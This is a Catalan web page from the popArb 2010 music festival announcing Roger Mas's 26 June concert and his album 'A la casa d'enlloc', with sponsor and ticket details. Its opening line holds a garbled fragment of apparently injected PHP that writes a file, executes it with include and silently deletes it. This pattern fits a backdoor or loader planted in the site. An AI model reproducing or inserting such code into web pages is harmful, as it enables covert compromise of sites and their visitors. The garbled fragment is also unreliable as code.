");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Roger Mas

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

Roger Mas

dissabte 26 de juny. 2010
Montsoriu (Can Cassó) 21:25

Roger Mas ens presentarà al popArb el seu nou disc A la casa d'enlloc. En aquest disc Roger Mas tomba novament cantonada per agafar un altre carrer. Un gir que busca la frescor de les seves primeres obres, amb lletres més senzilles i properes, petites històries amarades de poesia.

Si amb Mística domèstica, el seu cinquè disc, ens oferí cançons pròpies i producció aliena i després a Les cançons tel.lúriques poemes musicats de Verdaguer i músiques tradicionals però amb producció totalment pròpia, ara, des de A la casa d'enlloc ens regala cançons pròpies amb producció pròpia.

L'inici del disc conté també un petit homenatge als referents dels seus primers treballs (Sisa,Riba, Laguarda, Ia & Batista, etc.) i pica l'ullet als cantautors de la Nova Cançó. Un treball per depurar el seu estil i fer-lo més definit, per deixar més clar musicalment i a nivell de lletres qui és el cantautor Roger Mas.

Com ens diu ell mateix: "...és per tot això que en aquest disc nou, i fins i tot en el seu disseny de carpeta, reverberen ecos de tots els altres discos meus, detalls pensats també per al meu públic que coneix tots els altres treballs. Volia fer el disc definitiu, el que deixés ben clar qui sóc artísticament".

 

» +informació

» +imatges

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb